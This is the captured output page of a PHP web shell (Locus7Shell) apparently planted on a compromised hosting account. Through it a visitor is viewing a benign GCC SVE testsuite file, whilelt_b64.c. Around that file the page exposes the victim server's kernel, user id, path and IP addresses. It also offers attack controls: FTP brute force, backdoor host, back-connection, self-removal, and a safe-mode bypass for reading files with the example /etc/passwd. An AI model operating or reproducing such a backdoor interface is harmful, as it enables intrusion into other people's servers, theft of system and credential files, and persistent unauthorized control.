Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/sve/acle/asm/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     whilelt_b64.c (3.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-final { check-function-bodies "**" "" "-DCHECK_ASM" } } */

#include "test_sve_acle.h"

/*
** whilelt_rr_b64_s32:
**    whilelt    p0\.d, w0, w1
**    ret
*/
TEST_COMPARE_S (whilelt_rr_b64_s32, int32_t,
        p0 = svwhilelt_b64_s32 (x0, x1),
        p0 = svwhilelt_b64 (x0, x1))

/*
** whilelt_0r_b64_s32:
**    whilelt    p0\.d, wzr, w1
**    ret
*/
TEST_COMPARE_S (whilelt_0r_b64_s32, int32_t,
        p0 = svwhilelt_b64_s32 (0, x1),
        p0 = svwhilelt_b64 (0, x1))

/*
** whilelt_5r_b64_s32:
**    mov    (w[0-9]+), #?5
**    whilelt    p0\.d, \1, w1
**    ret
*/
TEST_COMPARE_S (whilelt_5r_b64_s32, int32_t,
        p0 = svwhilelt_b64_s32 (5, x1),
        p0 = svwhilelt_b64 (5, x1))

/*
** whilelt_r0_b64_s32:
**    whilelt    p0\.d, w0, wzr
**    ret
*/
TEST_COMPARE_S (whilelt_r0_b64_s32, int32_t,
        p0 = svwhilelt_b64_s32 (x0, 0),
        p0 = svwhilelt_b64 (x0, 0))

/*
** whilelt_r5_b64_s32:
**    mov    (w[0-9]+), #?5
**    whilelt    p0\.d, w0, \1
**    ret
*/
TEST_COMPARE_S (whilelt_r5_b64_s32, int32_t,
        p0 = svwhilelt_b64_s32 (x0, 5),
        p0 = svwhilelt_b64 (x0, 5))

/*
** whilelt_rr_b64_s64:
**    whilelt    p0\.d, x0, x1
**    ret
*/
TEST_COMPARE_S (whilelt_rr_b64_s64, int64_t,
        p0 = svwhilelt_b64_s64 (x0, x1),
        p0 = svwhilelt_b64 (x0, x1))

/*
** whilelt_0r_b64_s64:
**    whilelt    p0\.d, xzr, x1
**    ret
*/
TEST_COMPARE_S (whilelt_0r_b64_s64, int64_t,
        p0 = svwhilelt_b64_s64 (0, x1),
        p0 = svwhilelt_b64 ((int64_t) 0, x1))

/*
** whilelt_5r_b64_s64:
**    mov    (x[0-9]+), #?5
**    whilelt    p0\.d, \1, x1
**    ret
*/
TEST_COMPARE_S (whilelt_5r_b64_s64, int64_t,
        p0 = svwhilelt_b64_s64 (5, x1),
        p0 = svwhilelt_b64 ((int64_t) 5, x1))

/*
** whilelt_r0_b64_s64:
**    whilelt    p0\.d, x0, xzr
**    ret
*/
TEST_COMPARE_S (whilelt_r0_b64_s64, int64_t,
        p0 = svwhilelt_b64_s64 (x0, 0),
        p0 = svwhilelt_b64 (x0, (int64_t) 0))

/*
** whilelt_r5_b64_s64:
**    mov    (x[0-9]+), #?5
**    whilelt    p0\.d, x0, \1
**    ret
*/
TEST_COMPARE_S (whilelt_r5_b64_s64, int64_t,
        p0 = svwhilelt_b64_s64 (x0, 5),
        p0 = svwhilelt_b64 (x0, (int64_t) 5))

/*
** whilelt_rr_b64_u32:
**    whilelo    p0\.d, w0, w1
**    ret
*/
TEST_COMPARE_S (whilelt_rr_b64_u32, uint32_t,
        p0 = svwhilelt_b64_u32 (x0, x1),
        p0 = svwhilelt_b64 (x0, x1))

/*
** whilelt_0r_b64_u32:
**    whilelo    p0\.d, wzr, w1
**    ret
*/
TEST_COMPARE_S (whilelt_0r_b64_u32, uint32_t,
        p0 = svwhilelt_b64_u32 (0, x1),
        p0 = svwhilelt_b64 ((uint32_t) 0, x1))

/*
** whilelt_5r_b64_u32:
**    mov    (w[0-9]+), #?5
**    whilelo    p0\.d, \1, w1
**    ret
*/
TEST_COMPARE_S (whilelt_5r_b64_u32, uint32_t,
        p0 = svwhilelt_b64_u32 (5, x1),
        p0 = svwhilelt_b64 ((uint32_t) 5, x1))

/*
** whilelt_r5_b64_u32:
**    mov    (w[0-9]+), #?5
**    whilelo    p0\.d, w0, \1
**    ret
*/
TEST_COMPARE_S (whilelt_r5_b64_u32, uint32_t,
        p0 = svwhilelt_b64_u32 (x0, 5),
        p0 = svwhilelt_b64 (x0, (uint32_t) 5))

/*
** whilelt_rr_b64_u64:
**    whilelo    p0\.d, x0, x1
**    ret
*/
TEST_COMPARE_S (whilelt_rr_b64_u64, uint64_t,
        p0 = svwhilelt_b64_u64 (x0, x1),
        p0 = svwhilelt_b64 (x0, x1))

/*
** whilelt_0r_b64_u64:
**    whilelo    p0\.d, xzr, x1
**    ret
*/
TEST_COMPARE_S (whilelt_0r_b64_u64, uint64_t,
        p0 = svwhilelt_b64_u64 (0, x1),
        p0 = svwhilelt_b64 ((uint64_t) 0, x1))

/*
** whilelt_5r_b64_u64:
**    mov    (x[0-9]+), #?5
**    whilelo    p0\.d, \1, x1
**    ret
*/
TEST_COMPARE_S (whilelt_5r_b64_u64, uint64_t,
        p0 = svwhilelt_b64_u64 (5, x1),
        p0 = svwhilelt_b64 ((uint64_t) 5, x1))

/*
** whilelt_r5_b64_u64:
**    mov    (x[0-9]+), #?5
**    whilelo    p0\.d, x0, \1
**    ret
*/
TEST_COMPARE_S (whilelt_r5_b64_u64, uint64_t,
        p0 = svwhilelt_b64_u64 (x0, 5),
        p0 = svwhilelt_b64 (x0, (uint64_t) 5))

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0068 ]--